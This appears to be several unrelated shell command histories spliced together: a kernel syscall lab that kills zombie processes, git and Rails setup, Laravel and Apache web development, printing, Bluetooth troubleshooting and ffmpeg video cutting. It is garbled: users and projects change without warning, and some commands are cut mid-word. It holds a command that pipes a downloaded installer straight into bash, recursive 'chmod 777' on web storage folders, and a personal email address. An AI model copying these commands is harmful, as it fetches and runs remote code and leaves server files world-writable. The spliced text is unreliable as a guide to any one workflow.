stoogecalls/stoogecalls.c +vim stoogecalls/stoogecalls.c +vim arch/x86/entry/syscalls/syscall_64.tbl +vim stoogecalls/stoogecalls.c +uname -a +ls +gcc user.c -o user +viim user.c +vim user.c +gcc user.c -o user +vim user.c +gcc user.c -o user +vim user.c +gcc user.c -o user +vim user.c +gcc user.c -o user +vim user.c +gcc user.c -o user +vim user.c +gcc user.c -o user +vim user.c +gcc user.c -o user +vim user.c +gcc user.c -o user +vim user.c +gcc user.c -o user +./user +vim /usr/src/linux/stoogecalls/stoogecalls.c +vnc4transmitter +vim /usr/src/linux/ +vim stoogecalls/stoogecalls.c +exit +vim kernel/signal.c +make bzImage -j 2 +make modules +make modules_install +make install +reboot +vnc4transmitter +cat /var/log/messages +cat /var/log/messages |grep 4.3.3 +cat /var/log/messages |grep lock +cat /var/log/messages |grep locked +cat /var/log/messages |grep error +cat /var/log/messages |grep 16:21 +cat /var/log/messages |grep 16:20 +cat /var/log/messages |grep 16:19 +cat /var/log/messages |grep crash +cat /var/log/messages |grep dump +cat /var/log/dmesg +cat /var/log/dmesg |grep kill +cat /var/log/dmesg |grep lock +cat /var/log/dmesg.old |grep lock +ls /var/log -all +ls /var/log -all |grep 16 +cat /var/log/dmesg |grep kernel +cat /var/log/dmesg |grep 4.3.3 +cat /var/log/dmesg |grep 4\.3\.3 +cat /var/log/dmesg |grep 3.10.0 +vim kernel/signal.c +make bzImage -j 2 +vim kernel/signal.c +make bzImage -j 2 + +SSH command not found +yitian@transmitter:~$ SSH +SSH: command not found +yitian@transmitter:~$ + command not found +yitian@transmitter:~$ SSH +SSH: command not found +yitian@transmitter:~$ + command not found +yitian@transmitter:~$ SSH +SSH: command not found +yitian@transmitter:~$ +vim kernel/signal.c +make bzImage -j 2 +vim kernel/signal.c +make bzImage -j2 +make modules +make modules_instsall +make modules_install +make install +reboot +uname -r +vnc4transmitter +vim kernel/signal.c +make bzImage -j 2 +vim kernel/signal.c +make bzImage -j 2 +make modules +make modules_install +make install +reboot +vim stoogecalls/stoogecalls.c +make bzImage -j 2 +vim stoogecalls/stoogecalls.c +make bzImage -j 2 +vim stoogecalls/stoogecalls.c +make bzImage -j 2 +make modules +make modules_install +make install +exit +vnc4transmitter +reboot +exit +vim stoogecalls/stoogecalls.c +make bzImage -j 2 +make modules +ls +ls +vim user.c +gcc user.c -o user +vim user.c +gcc user.c -o user +./user +gcc user.c -o user +./user +gcc user.c -o user +./user +gcc user.c -o user +./user +gcc user.c -o user +./user +git add . +git add -A +git commit -m "project2lab2" +git push +ls +gcc user.c -o user +./user +vim stoogecalls/stoogecalls.c +vim ~/Project2/lab2/user.c +exit +make modules_install +make install +reboot +vnc4transmitter +ls +./user +make bzImage -j 2 +make modules +make modules_install +make install +reboot +vim user.c +ls +vim stoogecalls/stoogecalls.c +vim kernel/signal.c +mv * Project1 +mkdir Project1 +mv * Project1 +ls +mv Project1/Project2/ ./ +ls +ls +ls +gcc user.c -o user +./user +vnc4transmitter +./user +vim kernel/signal.c +make bzImage -j 2 +make modules +make modules_install +make install +reboot +ls +vnc4transmitter +./user +vim kernel/signal.c +vim stoogecalls/stoogecalls.c +make bzImage -j 2 +vim stoogecalls/stoogecalls.c +make bzImage -j 2 +make modules +make modules_install +make install +reboot +vim user.c +vim stoogecalls/stoogecalls.c +make bzImage -j 2 +make modules +make modules_install +make install +reboot +./user +vim user.c +vnc4transmitter +ls +./user +exit +vim stoogecalls/stoogecalls.c +make bzImage -j 2 +vim stoogecalls/stoogecalls.c +make bzImage -j 2 +make modules +make modules_install -j 2 +make install -j 2 +reboot +./user +cat /var/log/messages +./user +exit +vim stoogecalls/stoogecalls.c +make bzImage -j 2 +make modules -j 2 +make modules_install -j 2 +make install -j 2 +reboot +vnc4transmitter +./user +cat /var/log/dmesg +demsg +dmesg +vim stoogecalls/stoogecalls. +vim stoogecalls/stoogecalls.c +vim /usr/src/linux/ +vim kernel/signal.c +vim ~/Project2/lab2/user.c +vim stoogecalls/stoogecalls.c +vim stoogecalls/stoogecalls.c +make bzImage -j 2 +vim stoogecalls/stoogecalls.c +make bzImage -j 2 +vim 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8702 +ps aux | grep user +ps aux | grep zoombie +ps aux | grep user +kill 8702 +kill -9 8702 +ps aux | grep user +ps aux | grep zoombie +vnc4transmitter +ps aux | grep zoombie +ps aux | grep user +./user & +ps aux | grep user +ps -ea | grep user +reboot +ls +cp /usr/src/linux/.config ~/Project2/ +git add . +git add --all . +git commit -m "config" +git push +vim .bashrc +exit +ls +ls +mkdir lab4 +ls +exit +ls +ls +ls +vim Makefile +vim smunch.c +vim arch/x86/entry/syscalls/syscall_64.tbl +exit +make -j2 +vim kernel/signal.c +make bzImage -j 2 +vim kernel/signal.c +make bzImage -j 2 +vim kernel/signal.c +make bzImage -j 2 +make modules +make modules_install +make install +reboot +ser.c +ls +make +make user +vnc4transmitter +git add . +git commit -m "lab9" +git push +cp /usr/src/linux/kernel/signal.c Project2/lab4/signal.c +git add . +git commit -m "lab9-finish" +git push +./user +cat /usr/bin/vnc4transmitter +./user +vim /usr/src/linux/kernel/signal.c +vim /usr/src/linux/kernel/signal.c +vim kernel/signal.c +exit +git pull +ls +cp kernel-smunch-v2.0.c /usr/src/linux/stoogecalls/smunch.c +cat /usr/src/linux/stoogecalls/smunch.c +cp kernel-smunch-v2.0.c /usr/src/linux/stoogecalls/smunch.c +ls +vim /usr/src/linux/stoogecalls/Makefile +vim smunch.c +vim /usr/src/linux/arch/x86/entry/syscalls/syscall_64.tbl +vim smunch.c +vim user.c +ls -all +vim zoombie.c +make bzImage -j2 +make modules +make modules_install install +reboot +ls +./user & +vim user.c +make user +make smunch +./user & +./zoombie +mkdir smunch +mv stoogecalls/smunch.* smunch/ +./smunch 8734 256 +./smunch 8736 256 +ps aux |grep zoombie +vim user.c +vim zoombie.c +vim smunch +vim smunch.c +ls +vim user.c +make user +ls +ls +vim user.c +ls +vim user.c +vim /usr/src/linux/stoogecalls/Makefile +vim arch/x86/entry/syscalls/syscall_64.tbl +make bzImage -j2 +vim Makefile +vim stoogecalls/Makefile +vim smunch/Makefile +make bzImage -j2 +make modules +make modules_install +make install +vim smunch/smunch.c +make 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+git config --global user.email "bonnyd12@gmail.com" + git config --global user.name "bonnym" +git remote add origin git@bitbucket.org:bonnym/inkproductions.git +git remote add origin git@bitbucket.org:bonnym/inkproductions.git +git push origin master +git push -u origin --all +ssh git@github.com +git push -u origin --all +ssh git@github.com + git config --global user.name "Dir-Bonnym" +ssh git@github.com +git push -u origin --all +git s +git status +git push origin master +git remote add origin git@bitbucket.org:bonnym/inkproductions.git +git push + git push --set-upstream origin master +rbenv rehash +bundle -v +curlsercontent.com/fesplugas/rbenv-installer/master/bin/rbenv-installer | bash +echo "Bonface Obwoni" >> contributors.txt +git add contributors.txt +git commit -m 'Initial commit with contributors' +git push -u origin master +emacs ~/.bashrc +. ~/.bashrc +rbenv bootstrap-ubuntu-12-04 +ruvy -v +ruby -v +gem install bundler --no-ri --no-rdoc +rbenv rehash +bundle -v +ssh git@github.com +git remote add origin git@bitbucket.org:bonnym/inkproductions.git +git push -u origin + git config --global push.default simple + git push --set-upstream origin master + git config --global push.default matching + git push --set-upstream origin master +git push --set-upstream origin master +adduser deployers --ingroup admin +su deployer +adduser deploy +root ALL=(ALL) ALL +deploy ALL=(ALL) ALL +deploy ALL +adduser deployer --ingroup admin +deploy --ingroup admin +useradd -m -g admin deploy +useradd -m -g admin ME +sudo apt-get install build-essential patch zlib1g-dev libssl-dev libreadline5-dev +rvmsudo rvm install ree +apt-get install ree +gem install bundler +apt-get install rails +rails -v +git remote origin add git@bitbucket.org:bonnym/ink.git +git remote add origin git@bitbucket.org:bonnym/ink.git +git clone git@bitbucket.org:bonnym/ink.git +ssh-add ~/.ssh/id_rsa +ssh -V username@github.com +ls -al ~/.ssh +ssh-keygen -t rsa -b 4096 -C "bonnyd12@gmail.com" +pbcopy < ~/.ssh/id_rsa.pub +su deploy +grunt +grep -r 'param' . +grep -r '.param' . +ls +cp -r element-overview/ ~/webentwicklung/webappcreations/Kunden/Contentflow/Backups/ +yaourt git gui +yaourt git +yaourt git-cola +systemctl +systemctl disable nginx.service +sudo systemctl disable nginx.service +sudo systemctl enable httpd.service +sudo systemctl restart httpd.service +systemctl +systemctl status httpd.service +sudo systemctl restart httpd.service +systemctl status httpd.service +sudo systemctl restart httpd.service +systemctl status httpd.service +sudo systemctl restart httpd.service +systemctl +systemctl +sudo systemctl stop nginx.service +systemctl +sudo systemctl restart httpd.service +systemctl +geany .env +php artisan migrate --seed +php artisan make:auth +mkdir Backups +compton& +killall compton +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +ls +la +pwd +gulp watch +arandr +php artisan server +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan down +php artisan up +php artisan serve +php artisan serve +php artisan serve +htop +php artisan serve +php artisan serve +php artisan serve +php artisan serve +nmap -sT -O localhost +yaourt nmap +php artisan serve +nmap -sT -O localhost +sudo nmap -sT -O localhost +sudo nmap -sT -O localhostd +sudo nmap -sT -O localhost +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan down +php artisan up +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +htoop +htop +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan stop +php artisan down +php artisan serve +php artisan up +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan serve +php artisan down +php artisan serve +php artisan up +php artisan serve +php artisan down +php artisan serve +php artisan up +php artisan serve +php artisan down +php artisan up +ls +ls +git add element-overview/element-overview.html +git add element-overview/element-overview.js +git add element-overview.html +git add angular/components/flow-panel-contenteditor/element-overview/element-overview.html +git add angular/components/flow-panel-contenteditor/element-overview/element-overview.js +git add angular/components/flow-panel-contenteditor/flow-panel-contenteditor.html +git add angular/components/flow-panel-contenteditor/flow-panel-contenteditor.js +git add angular/components/flow-panel-contenteditor/element-overview/element-overview.js +ls +cp -r Backend Backend_DragAndDrop +ls +git status +git status +git status +git checkout master +git pull origin/master +git pull master +git pull +git stash +git pull +git remote show origin +git branch -a +git branch -a +git checkout ContentEditorDragAndDrop +git status +git stash list +git checkout master +git stash list +git status +git status +ls +cp -r Backend Backend_sav2 +mv Backend Backend_alsmost_org +cp -r Backend_DragAndDrop/ Backend +git status +git status +git status +git add . +git status +git reset +git status +htop +ls +gulp watch +grep -r '*contenteditor.js' . +grep -r 'contenteditor.js' . +find -name 'contenteditor.js' +find -name 'contenteditor.js' . +find . -name 'contenteditor.js' +find . -name '*contenteditor.js' +node server.js +printer +gulp watch +gulp watch +sudo updatedb +locate php.ini +vim /etc/php/php.ini +sudo systemctl restart httpd.service +sudo chmod 777 /srv/http/contentflow/Backend/storage/ +ls +sudo vim /etc/httpd/conf/extra/httpd-vhosts.conf +vim /etc/php/php.ini +vim .env +ls +vim test.php +sudo chmod -R 777 /srv/http/contentflow/Backend/storage/ +php artisan migrate:refresh --seed +git status +ls +ls +cp -r Backend Backend_DragAndDrop2 +ls +git pull origin master +git stash +git pull origin master +vim .gitignore +git status +vim .gitignore +git status +git rm --cached -r public/ +git add public/favicon.ico +git add public/index.php +git add public/.htaccess +git add public/robots.txt +git status# +git status +git status +git add public/web.config +git add app/**/ +git add resources/**/ +git status +git add .gitignore +git commit -m 'fixing gitignore-iusses' +git push origin/master +git push origin master +git pull +git pull origin master +git status +git push origin ContentEditorDragAndDrop +git status +git status +git log +git reset 3f363fc7de1311b2dc13eb25ca0e17ba4b75afae +git status +git log +yaourt giteye +git status +git commit -m ''' +git commit -m 'reverting to commit 3f363fc7d' +git reset --soft HEAD@{1} +git commit -m 'reverting to commit 3f363fc7d' +git reset --hard +git status +git push origin ContentEditorDragAndDrop +git status +git status +git branch +git checkout master +git pull origin master +git stash +git pull origin master +git --fetch all +git fetch --all +git reset --hard origin/master +git status +git status +git status +vim .gitignore +vim .gitignore +git add .gitignore +git -commit - 'fixing .gitignore issues' +git commit -m 'fixing .gitignore issues' +git push origin master +git checkout ContentEditorDragAndDrop +git status +git add resources/assets/bower/jquery-ui/ +git status +resources/assets/bower/jquery-ui/ +git commit -m 'adding jquery-ui to the resources' +git status +git checkout master +git stash +git checkout master +git pull origin master +vim .gitignore +git status +git status +git checkout master +git status +git checkout -b MediaModul +git checkout master +git branch -d MediaModul +git pull origin master +git fetch --all +git reset --hard origin/master +git status +git checkout -b MediaModul +ls +git checkout master +git pull origin master +git checkout MediaModule +git branch +git branch -d MediaModul +git checkout -b MediaModule +git checkout MediaModule +sudo vim /etc/httpd/conf/extra/httpd-vhosts.conf +vim /etc/httpd/conf/extra/httpd-vhosts.conf +vim /etc/hosts +sudo systemctl restart httpd.service +sudo mkdir Frontend +git clone git@gitlab.com:Content-Flow/Frontend.git +git clone git@gitlab.com:Content-Flow/Frontend.git +la +la +ls +la +la +sudo mkdir Frontend +la +git clone git@gitlab.com:Content-Flow/Frontend.git +la +sudo chown goalador:goalador Frontend/ +git clone git@gitlab.com:Content-Flow/Frontend.git +la Frontend/ +vim /etc/hosts +sudo systemctl restart httpd.service +vim /etc/httpd/conf/extra/httpd-vhosts.conf +ls +la +la storage/ +ls +la +sudo chmod -r 777 efs/ +sudo chmod 777 -r efs/ +sudo chmod -R ugo+rw efs/ +la +la efs/ +la efs/storage/ +la 2 +sudo chmod -R ugo+rw 2/ +la 2 +sudo chmod -R ugo+rwx 2/ +la 2 +la +la 2 +sudo vim /etc/httpd/conf/extra/httpd-vhosts.conf +ls +la +sudo vim /etc/httpd/conf/extra/httpd-vhosts.conf +sudo vim /etc/httpd/conf/extra/httpd-default.conf +locate apache2 +vim/etc/httpd/conf/httpd.conf +vim /etc/httpd/conf/httpd.conf +tail error_log +tail error_log +git status +ls +unzip -e efs +ls +la +sudo cp -r efs / +ls +la efs/ +php artisan migrate:refresh --seed +composer dump-autoload +php artisan migrate:refresh --seed +php artisan migrate:refresh --seed +tail 1490977013OHkLIgDh8FX0V7jE1uQHlsF0nypNND6AUwAdLMStSHMe79MGJ4h1KDVTvSxyBYSx.jpg +tail /var/log/httpd/storage-contentflow-error_log +sudo vim /etc/httpd/conf/extra/httpd-vhosts.conf +sudo mv /efs /srv/http/ +ls /srv/http/ +sudo systemctl restart httpd.service +locate file.php +locate File.php +locate File.php +sudo vim /etc/httpd/conf/extra/httpd-vhosts.conf +sudo systemctl restart httpd.service +sudo vim /etc/httpd/conf/extra/httpd-vhosts.conf +sudo systemctl restart httpd.service +sudo vim /etc/httpd/conf/extra/httpd-vhosts.conf +sudo systemctl restart httpd.service +systemctl +systemctl status httpd.service +systemctl status httpd.service +sudo systemctl restart httpd.service +systemctl status httpd.service +systemctl status httpd.service +sudo systemctl restart httpd.service +systemctl status httpd.service +ls /efs +sudo mkdir /efs + sudo mv /srv/http/efs/ / +ls /efs +sudo vim /etc/httpd/conf/extra/httpd-vhosts.conf +vim /etc/httpd/conf/extra/httpd-vhosts.conf +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +git checkout -b ContentEditorDragAndDrop2 +git branch +git status +git checkout master +vim .gitignore +git status +git rm --cached public/css/app.css +git rm --cached public/js/app.js +git rm --cached public/js/app.js.map +git rm --cached public/views/ +git rm --cached -r public/views/ +git status +git add app/Http/Controllers/HomeController.php +git add -r resources/views/ +git add resources/views/ +git status +git commit -m 'fixing more .gitignore issues' +git push origin master +git status +git branch -d ContentEditorDragAndDrop2 +git checkout -b ContentEditorDragAndDrop2 +git status +bower install --save jquery-ui +git status +git status +gulp watch +gulp watch +git branch -d ContentEditorDragAndDrop2 +git branch +gulp watch +gulp watch +gulp watch +rm -r jquery.shapeshift/ +ls +mv jquery-ui/ jquery-ui~ +mv jquery-ui~ jquery-ui +yaourt epub reader +yaourt epub reader +ppub +yaourt scrivener +htop +calibre +yaourt calibre +startx +sudo pacman -Syu +sudo shutdown -r now +sudo cp -r neu\ -\ Final\ -\ 18.02.2010/ /srv/http/theatermaer18022010 +sudo cp -r neu\ -\ Kopie\ \(5\)/ /srv/http/theatermaer +yaourt draw on screen +pylote +pylote +grunt +node server.js +gulp watch +node server.js +history +echo $HISTSIZE +cat ~/.bash_history +history +cat ~/.bash_history +print 20170326_Ausschreibung_koelnglobal-final-1.pdf +chr +l +ls +la +la storage/ +la storage/2/ +feh storage/2/1490977013OHkLIgDh8FX0V7jE1uQHlsF0nypNND6AUwAdLMStSHMe79MGJ4h1KDVTvSxyBYSx.jpg +ls +la +ls +la +chown -R http:http 2 +sudo chown -R http:http 2 +la +sudo chomod -R 777 2 +sudo chmod -R 777 2 +la 2 +mkdir media-loop +touch media-loop.html +touch media-loop.js +cp media-loop.js ../element-media.js +rm -r media-loop/ +la +ls +sudo rm -r slick +sudo rm -r jquery-slimscroll/ +ls +ls +rm -r font +rm -r fonts +history +history >> ~/history_backup.txt +la +la 2 +chmod -r 777 2 +chmod -r 777 . +sudo chmod 777 . +la +sudo chmod -R 777 2 +la +sudo chmod -R 777 3 +gulp watch +php artisan migrate:refresh --seed +php artisan migrate:refresh --seed +php artisan migrate:refresh --seed +gulp watch +gulp watch +php artisan migrate:refresh --seed +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +bower install --save slimscroll +gulp watch +gulp watch +bower install --save slick +gulp watch +gulp watch +gulp || gulp watch +gulp && gulp watch +bower install --save slick-carousel +gulp && gulp watch +gulp && gulp watch +gulp && gulp watch +gulp watch +gulp && gulp watch +ls +ls +ls +cp element-add-text.html element-add-media.html +ls +ls +ls +cp -r element-text/ element-media +mv element-text.html element-media.html +ls +ls +ls +ls + cd element-detail/ +ls +cp element-detail-livestream.html element-detail-media.html +cp element-detail-livestream.js element-detail-media.js +ls +cp LivestreamController.php MediaController.php +ls +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +ls +ls +ls +ls +mkdir mediaLoop +mv element-media.* mediaLoop/ +touch element-media.html +mv element-media.html media-loop.html +mv element-media.js media-loop.js +mv mediaLoop/ media-loop +mv media-loop/media-loop.js . +mv media-loop.js element-media.js +node server.js +history +history >> ~/history_backup.txt +killall inkscape +ls +ls +ls storage/ +la storage/ +ls +sqlite3 storage/data/cockpit.sqlite +sudo sqlite3 storage/data/cockpit.sqlite +ls +cp -r skillshare/ koelnglobal +node server.js +ps aux | grep conky +kill 925 +kill 914 + conky -c /usr/share/conky/conky_maia +ps aux | grep conky +kill 905 +node server.js +history +node server.js +ls +convert -density 150 * Praesentation-Koelnglobal.pdf +ls +la +mupdf Praesentation-Koelnglobal.pdf +ls +ls +git clones/fontselect-jquery-plugin.git +ls +ls +ls +chromium index.html +ls +ks +ls +ls +geany jquery.fontselect.js +xfce4-power-manager +xfce4-power-manager-settings +ls +print Agile_Projectmanagement.pdf Amazon_Handauflage_Tastatur_Maus.pdf Amazon_Huion_Grafiktablet.pdf Amazon_Laptopstaender.pdf Amazon_XP-Pen_Grafiktablett.pdf +print Amazon_Handauflage_Tastatur_Maus.pdf Amazon_Huion_Grafiktablet.pdf Amazon_Laptopstaender.pdf Amazon_XP-Pen_Grafiktablett.pdf +print Amazon_Huion_Grafiktablet.pdf Amazon_Laptopstaender.pdf Amazon_XP-Pen_Grafiktablett.pdf +print Amazon_Laptopstaender.pdf Amazon_XP-Pen_Grafiktablett.pdf +print Amazon_XP-Pen_Grafiktablett.pdf +php artisan migrate:make create_elementgallery +php artisan make:migration create_elementgallery_table +php artisan make:seeder ElementgalleryTableSeeder +ls +ls database/ +ls +rm ElementgalleryTableSeeder.php +php artisan migrate:refresh --seed +php artisan migrate:refresh --seed +gulp watch +gulp && gulp watch +gulp && gulp watch +gulp && gulp watch +gulp watch +git branch +gulp watch +htop +gulp watch +git status +gulp watch +gulp watch +gulp watch +gulp && gulp watch +gulp && gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +php artisan migrate:refresh --seed +gulp watch +ls +ls +ls +mv element-media/ element-gallery +ls +mv element-media.html element-gallery.html +mv element-media.js element-gallery.js +rm -r media-loop/ +ls +ls +ls +ls +ls +mv MediaController.php GalleryController.php +php artisan migrate:refresh --seed +ls +mv element-detail-media.js element-detail-gallery.js +mv element-detail-media.html element-detail-gallery.html +ls +ls +mv element-add-media.html element-add-gallery.html +git status +git status +php artisan migrate:refresh --seed +locate 'Portfolio' +locate Portfolio +vim /etc/httpd/conf/extra/httpd-vhosts.conf +sudo systemctl restart httpd.service +rm public/views/components/flow-panel-contenteditor/element-add/element-add-media.html +php artisan migrate:refresh --seed +php artisan migrate:refresh --seed +ls +print Stop_Start_Continue_Worksheet.pdf +htop +yaourt handbreak +ls +mkdir amplified +mv vokoscreen-2017-04-09_23-31-09.mkv amplified/ +ls +ffmpeg -i vokoscreen-2017-04-09_23-31-09.mkv -af "volume=20dB" Koelnglobal-Praesentation.mkv +ls +la +mplayer Koelnglobal-Praesentation.mkv +redshift +ls +ls +ls +gulp watch +history +ls +convert andrew-ridley-76547.jpg andrew-ridley-76547_small.jpg +la +convert -q 80 andrew-ridley-76547.jpg andrew-ridley-76547_small.jpg +convert -quality 80 andrew-ridley-76547.jpg andrew-ridley-76547_small.jpg +la +cp andrew-ridley-76547_small.jpg ~/webentwicklung/webappcreations/Webseiten/skillshare/images/ +la +ls +ls +print Rechnung_Interone_OneWeb_08-03-2017_2.pdf Rechnung_Interone_OneWeb_18-04-2017.pdf +print Rechnung_Interone_OneWeb_18-04-2017.pdf +scv print +lpr --list + +scv print +scv print +lpr -P 6500-E709e Rechnung_Interone_OneWeb_08-03-2017_2.pdf +scv print +lpr -P 6500-E709a Rechnung_Interone_OneWeb_08-03-2017_2.pdf +lpr -o fit-to-page -o media=A4 -P 6500-E709a Rechnung_Interone_OneWeb_08-03-2017_2.pdf +lpr -o fit-to-page -o media=A4 -P 6500-E709a Rechnung_Interone_OneWeb_18-04-2017.pdf +xbacklight -set 2 +xbacklight set 1 +xbacklight -set 1 +redshift +redshift +redshift +ps aux | grep conky +conky -c /home/goalador/Linux/Conky/webappcreations_topic +ls +print Airbnb-Wohnung-Robin.pdf +gulp watch +gulp watch +php artisan migrate:refresh --seed +gulp watch +gulp watch +gulp watch +gulp watch +php artisan make:migration create_galleryimages_table +php artisan migrate:refresh --seed +php artisan make:model Gallery +php artisan migrate:refresh --seed +php artisan make:model Galleryimage +php artisan migrate:refresh --seed +php artisan migrate:refresh --seed +php artisan migrate:refresh --seed +php artisan migrate:refresh --seed +php artisan migrate:refresh --seed +php artisan migrate:refresh --seed +gulp watch +gulp watch +node server.js +node server.js +node server.js +ranger +s +ls +ls +cp mediapicker.js mediapicker.html ../flow-panel-contenteditor/element-overview/overview-element/element-gallery/ +mv mediapicker.html manage-gallery.html +mv mediapicker.js manage-gallery.js +blueman-manager +yaourt pulseaudio-bluetooth +sudo systemctl restart bluetooth.service +sudo systemctl enable bluetooth.service +bluetoothctl +yaourt blue +bluetoothctl +sudo bluetoothctl +bluetoothctl +bluetoothctl +pulseaudio -h +pulseaudio -kill +pulseaudio --kill +pulseaudio --start +bluetoothctl +gulp watch +vim /etc/pulse/default.pa +vim +vim +vim /etc/bluetooth/main.conf +pavucontrol +pavucontrol +bluetoothctl +bluetoothctl +blueman-manager +bluetoothctl +sudo systemctl start bluetooth +sudo systemctl enable bluetooth +systemctl status bluetooth +bluetoothctl +nm-applet +killall nm-applet +nm-applet +ls +node server.js +gulp watch +gulp watch +bluetoothctl +systemctl +dmesh +dmesg +node server.js +htop +find /usr/share/icons ~/.icons -type d -name "cursors" +XCURSOR_THEME=SomeThemeName xclock +ls +find /usr/share/icons ~/.icons -type d -name "cursors" +ln -s /usr/share/icons/theme-name/cursors ~/.icons/default/cursors +ls +ls default/ +cat default/index.theme +vim default/index.theme +ln -s ~/.icons/DMZ-Highlight/cursors ~/.icons/default/cursors +ln -s ~/.icons/DMZ-Highlight/cursors ~/.icons/default/cursors +lpr -o fit-to-page -o media=A4 -P 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04:28:15 output1.mkv -vcodec copy -acodec copy -ss 04:28:15 -t 16:23:08 output2.mkv +ls +la +ffmpeg -i 00_7_Ahead_4-28_then_00_8_Overview.mkv -vcodec copy -acodec copy -ss 00:00:00 -t 04:28:15 output1.mkv +ffmpeg -i 00_7_Ahead_4-28_then_00_8_Overview.mkv -vcodec copy -acodec copy -ss 00:00:00 -t 04:28:15 00_7_Ahead_4-28.mkv +ffmpeg -i 00_7_Ahead_4-28_then_00_8_Overview.mkv -vcodec copy -acodec copy -ss 04:28:15 00_8_Overview.mkv +la +mplayer 00_7_Ahead_4-28.mkv +ffmpeg -i 00_7_Ahead_4-28_then_00_8_Overview.mkv -vcodec copy -acodec copy -ss 00:00:00 -t 00:04:28:15 00_7_Ahead_4-28.mkv +ffmpeg -i 00_7_Ahead_4-28_then_00_8_Overview.mkv -vcodec copy -acodec copy -ss 00:00:00 -t 00:04:28 00_7_Ahead_4-28.mkv +la +mplayer 00_7_Ahead_4-28.mkv +mplayer 00_7_Ahead_4-28.mkv +mplayer 00_7_Ahead_4-28.mkv +ffmpeg -i 00_7_Ahead_4-28_then_00_8_Overview.mkv -vcodec copy -acodec copy -ss 00:04:28 00_8_Overview.mkv +mplayer 00_8_Overview.mkv +ls +mkdir Done +mv 00_7_Ahead_4-28_then_00_8_Overview.mkv Done/ +ls +rm output1.mkv +rm output2.mkv +ls +mplayer 00_6_Example_Onepager.de_24-45.mkv +ffmpeg -i 00_6_Example_Onepager.de_24-45.mkv -vcodec copy -acodec copy -ss 00:00:00 -t 00:02:33.000 00_5_2_Reciproka2.mkv +mplayer 00_5_2_Reciproka2.mkv +ffmpeg -i 00_6_Example_Onepager.de_24-45.mkv -vcodec copy -acodec copy -ss 00:00:00 -t 00:02:32.700 00_5_2_Reciproka2.mkv +mplayer 00_5_2_Reciproka2.mkv +history +ffmpeg -i 00_6_Example_Onepager.de_24-45.mkv -vcodec copy -acodec copy -ss 00:02:36.000 00_6_Example_Onepager.de_24-45_new.mkv +mplayer 00_6_Example_Onepager.de_24-45_new.mkv +mplayer 00_6_Example_Onepager.de_24-45_new.mkv +mplayer 00_6_Example_Onepager.de_24-45_new.mkv +mv 00_6_Example_Onepager.de_22-09.mkv +mv 00_6_Example_Onepager.de_24-45_new.mkv 00_6_Example_Onepager.de_22-09.mkv +ls +mv 00_6_Example_Onepager.de_24-45.mkv Done/ +ls +mplayer vokoscreen-2017-04-26_13-32-02.mkv +ffmpeg -i vokoscreen-2017-04-26_13-32-02.mkv -vcodec copy -acodec copy -ss 00:00:00 -t 00:04:23.200 00_3_1_notPerfect.mkv +mv 00_3_1_notPerfect_and_unsplash.com.mkv +mv 00_3_1_notPerfect.mkv 00_3_1_notPerfect_and_unsplash.com.mkv +ffmpeg -i vokoscreen-2017-04-26_13-32-02.mkv -vcodec copy -acodec copy -ss 00:04:23:200 -t 00:07:31.170 00_3_2_Who_What_Why.mkv +ffmpeg -i vokoscreen-2017-04-26_13-32-02.mkv -vcodec copy -acodec copy -ss 00:04:23.200 -t 00:07:31.170 00_3_2_Who_What_Why.mkv +ffmpeg -i vokoscreen-2017-04-26_13-32-02.mkv -vcodec copy -acodec copy -ss 00:07:33.010 -t 00:12:51.030 00_3_3_Amazon_and_Paypal.mkv +killall openshot +htop +killall openshot-qt +yaourt v4 +yaourt video edit +pacman -R cinelerra-cv +sudo pacman -R cinelerra-cv +yaourt video edit +yaourt lossless +yaourt ffmpeg +yaourt avidemux +yaourt vidcutter +ls +mplayer vokoscreen-2017-04-26_13-32-02_edit_w1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w1.mkv +ls +mplayer vokoscreen-2017-04-26_13-32-02.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w2.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w2.mkv +rm vokoscreen-2017-04-26_13-32-02_EDIT_w1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w2.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w2.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w3_ontrack.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w3_ontrack.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w3_ontrack.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w3_ontrack.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w3_ontrack.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w3_ontrack.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w3_ontrack.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w3_ontrack.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w3_ontrack2.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w3_ontrack2.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w3_ontrack2.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +yaourt avidemux +vlc vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +mplayer vokoscreen-2017-04-26_13-32-02_edit_w4_UI_and_UX1.mkv +mplayer 